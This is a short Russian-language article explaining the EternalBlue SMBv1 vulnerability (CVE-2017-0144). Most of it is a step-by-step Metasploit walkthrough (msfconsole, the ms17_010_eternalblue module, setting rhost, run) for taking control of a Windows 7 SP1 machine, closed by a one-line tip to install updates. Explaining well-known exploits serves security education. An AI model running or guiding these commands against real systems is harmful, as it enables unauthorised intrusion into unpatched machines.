Внимание! Информация в данной статье служит исключительно для ознакомления и осведомления. Данный материал не является призывом к действию
Многие из вас слышали об уязвимости EternalBlue (или CVE-2017-0144), затрагивающей ОС семейства Windows. Считается, что к разработке причастно АНБ (Агентство Национальной Безопасности США). Данный эксплойт затрагивает уязвимость в Windows-реализации протокола SMB.
Этот модуль является портом эксплойта группы ETERNALBLUE, частью инструментария FuzzBunch, выпущенного Shadow Brokers. Существует операция переполнения буфера в Srv! SrvOs2FeaToNt. Размер вычисляется в Srv! SrvOs2FeaListSizeToNt, с математической ошибкой, когда DWORD вычитается в WORD. Пул ядра подготовлен так, чтобы переполнение было хорошо продуманно, чтобы перезаписать буфер SMBv1. Фактический захват RIP будет завершен позже в srvnet! SrvNetWskReceiveComplete.
Так как же его используют? Всё очень просто
В качестве атакующего хоста используем Kali linux, а в качестве атакуемого объекта - Windows 7 SP1
Запускаем в терминале Kali linux Metasploit
> msfconsole
Загружаем нужный нам модуль
> use exploit/windows/smb/ms17_010_eternalblue
Указываем ip-адрес атакуемого нами компьютера с ОС Windows
> set rhost 192.168.1.176
и запускаем выбранный эксплойт
> run
Таким нехитрым образом, используя уязвимость, можно получить доступ к управлению операционной системой Windows.
Ну а чтобы защититься от EternalBlue - своевременно устанавливайте последние обновления для вашей операционной системы...или переходите на Linux :)